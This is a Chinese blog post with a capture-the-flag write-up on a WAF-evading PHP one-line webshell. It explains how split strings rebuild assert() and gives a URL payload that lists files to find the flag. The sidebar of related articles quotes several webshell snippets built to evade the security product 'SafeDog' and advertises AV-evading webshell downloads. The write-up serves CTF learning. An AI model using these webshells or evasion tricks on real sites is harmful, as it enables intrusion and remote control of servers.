过狗一句话

最新推荐文章于 2023-01-29 18:47:54 发布
最新推荐文章于 2023-01-29 18:47:54 发布
阅读量1k 收藏
点赞数
分类专栏: bugkuweb题解 文章标签: 过狗一句话
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xyx107/article/details/89600616
版权

题意大致为网站含有一句话漏洞,可以利用这个漏洞得到flag;

1.PHP explode(),此函数可以将字符串打散为数组

如:$str = "i love flag !";

       print_r(explode(" ",$str));

输出为:Array([0]=>i[1]=>love[2]=>flag[3]=>!);

按照“ ”引号内(即separator)的字符划分。

2.PHP scandir()函数

如:$dir = “/images/”;

       $a = scandir($dir);(默认升序) 

       print_r($a);

 输出会列出/images/目录的文件和目录。

3.assert(),同eval()函数一样是同一种将字符串当成代码来执行的函数

具体参见博客:https://blog.csdn.net/fuckcat_2333/article/details/52122182

4.分析本题的过狗一句话:

poc_1被打散为a  s  s  e  r  t,存放在poc_2。

此时poc_2即为assert,poc_2利用get的方式获取一个s 的值,s的值在地址栏直接输入,执行poc_2()内的代码。

可以执行查看目录等命令。

http://123.206.87.240:8010/?s=print_r(scandir('./'))

得到一个flag相关文件,打开得到flag。

xyx107
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2015年最新的过狗一句话大马
12-26
【标题】:“2015年最新的过狗一句话大马”通常是指在2015年流行的、能够绕过安全软件检测的恶意代码,特别是针对防病毒软件("狗"在这里是民间对防病毒软件的俗称)的一句话木马。这类木马以其简洁高效而闻名,能够...
webshell一句话
08-26
php,jsp,asp等脚本的常用一句话拿webshell,然后用菜刀连接即可
PHP一句话后门过狗姿势万千之后门构造与隐藏
weixin_30454481的博客
02-03 448
第二章节主要带给大家一些后门构造思路,与安全狗文件特征检测的机制。 另外强调一下,这篇文章需要大家对于php有一定的认识。 本章节分为三大部分,第一部分针对初级,分析菜刀php代码的执行过程,较基础;第二部分主要总结一些可以利用的后门姿势,这部分我主要给大家分享一些搜集的后门,希望可以拓展大家的思路;第三部分主要分享后门隐藏之道。 声明:在后门举例中大部分后门构造与思路,可能网上都有类似的,...
过狗一句话原理与利用
金色%夕阳的博客
05-03 1842
过狗一句话原理与利用 在之前的文件上传漏洞中就有介绍过木马文件,通过上传木马文件实现远程连接从而进行远程控制操作。利用上传文件漏洞上传木马文件过程中,可能会遇到服务端对上传文件后缀、文件名、文件格式以及文件内容等进行检测过滤,从而导致木马文件上传失败。如今存在很多过滤机制与安全产品能够实现网站上传保护,比如安全狗。因此,学习如何绕过这些保护机制成功上传木马文件是至关重要的。在下面的学习中我们称之为过狗一句话,该名称源于绕过安全狗的检测机制成功过上传一句话木马文件。 在学习过狗一句话之前,需要先学习一句话木马
斗狗记之PHP一句话bypass
KEY0NE的个人博客
12-22 206
分享两个过狗的PHP一句话吧,并且讲一讲我的过狗思路<?php#木马免杀:从打狗到被狗咬 error_reporting(0); echo"404NotFound."; $building="ps_ot*^7#[emailprotected]@666666666666666666666666666...
过狗一句话
qq_41814777的博客
10-20 983
php过狗一句话: waf通常以关键字来判断是否是一句话木马。 <?php $test="e#v#a#l"; $test1=explode("#",$test); $test2=$test1[0].$test1[1].$test1[2].$test1[3]; $test2($_POST['zt']); ?> 这是eval函数的一句话的写法 <?...
php 过狗一句话木马的编写
热门推荐
大方子
09-02 1万+
  我们都知道 这个是php一句话  &lt;?php assert($_POST['mima']); ?&gt;可是服务器的安全狗会识别到,我们要经过一些处理, 让安全狗不能认出我们的代码是一句话木马。 好多小白只会用一句话,但是不知道原理,我先大概说一下一句话木马的原理 assert是一个php的函数 assert(这里写代码)  这个函数会执行括号里的代码,(eval 的一句话木...
过安全狗的aspx一句话webshell
02-08
过安全狗的aspx一句话webshell 纯CS模式,经典免杀
过狗exp一枚
09-26
过狗百分百,-7是觉多要记住的,到时候填写的时候填-7,-7是口令哦!
最新过安全狗一句话
10-14
综上所述,这段代码旨在通过一系列复杂的操作(包括反射机制和字符串拼接)来绕过安全软件(如“安全狗”),进而执行恶意代码。这种技术手段对于网站的安全防护构成了挑战,也提醒我们在开发和维护Web应用时,需...
2019最新过狗过,云锁,360等WAF的PHP免杀大马
02-02
2019最新过狗过,云锁,360等WAF的PHP免杀大马等主流防护软件
php免杀大马一句话,过主流waf
06-20
PHP语言异常灵活,日站的时候经常被waf拦截,于是花了点时间弄了个免杀的PHP大马,减小了体积,测试安全狗云锁阿里云360主机卫士全都过。上传换点积分。没积分的在这儿下 https://pan.baidu.com/s/1dF5rfVF
免杀PHP大马过狗
06-13
免杀PHP大马过狗欢迎大家来测试密码123123本程序不得用于商业用途,仅做学习交流
易语言一句话连接模块
01-31
一句话连接,asp一句话,php一句话,易语言一句话 一句话连接,asp一句话,php一句话,易语言一句话
【免杀】————1、PHP一句话过狗、卫士、D盾等免杀思路
Fly_鹏程万里
03-04 1698
00x1.关键字拆分 比如assert,可以写成 ‘a’.’ss’.’e’.’r’.’t’这样。 总结:这种方法虽然简单,但是却没有太强的免杀功效,需要结合其他方法。 00x2.可变变量、引用、可变函数。 可变变量:比如$a=$_POST[‘x’];$b=’a’;@eval($$b); 测试结果: 总结:这种方法对狗等WAF可以绕过哦~但是对于D盾这种多规则的是无效的!引用:比...
一句话木马过狗 php,PHP一句话木马过安全狗等杀软
weixin_30774813的博客
03-09 316
第一种:1.php=($_=@$_GET[2]).@$_($_GET[1])?>用中国菜刀连接:http://www.cn-caidao.com/1.php?2=assert密码是1第二种:2.php$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>=${'_'.$_}['_'](${'_'....
00截断上传绕过_绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)...
weixin_39663970的博客
12-20 242
思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测。废话不多说,切入正题。。。。1、实验环境:Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.120482、用于文件上传的PHP源码:...
过安全狗/D盾/360的PHP一句话木马与防范方法
主题模板站的博客
01-29 837
D盾,他不认识二维数组,所以就很轻松绕过了。对了 还有360哦~ 测试了下安全狗,也查不出来,,。防御方法:就是网站下载下来这些php文件,然后通过字符串查找,类似上面的字符。本文阐述了过安全狗/D盾/360的PHP一句话木马,欢迎大家多多指点。过D盾很容易,当然下面还提供一个0等级就的。这样改,立马就变成1个等级的了。过D盾PHP一句话木马。
过狗一句话汇总(包含asp+php+aspx+jsp)
最新发布
01-26
过狗一句话汇总,是一个用于表示利用各种网站漏洞在网站上发布恶意代码的黑客行为。这个词通常与ASP、PHP、ASPX、JSP等网站开发语言相关联。黑客们会在网站上植入恶意代码,比如恶意脚本、木马病毒等,以获取用户的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xyx107

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值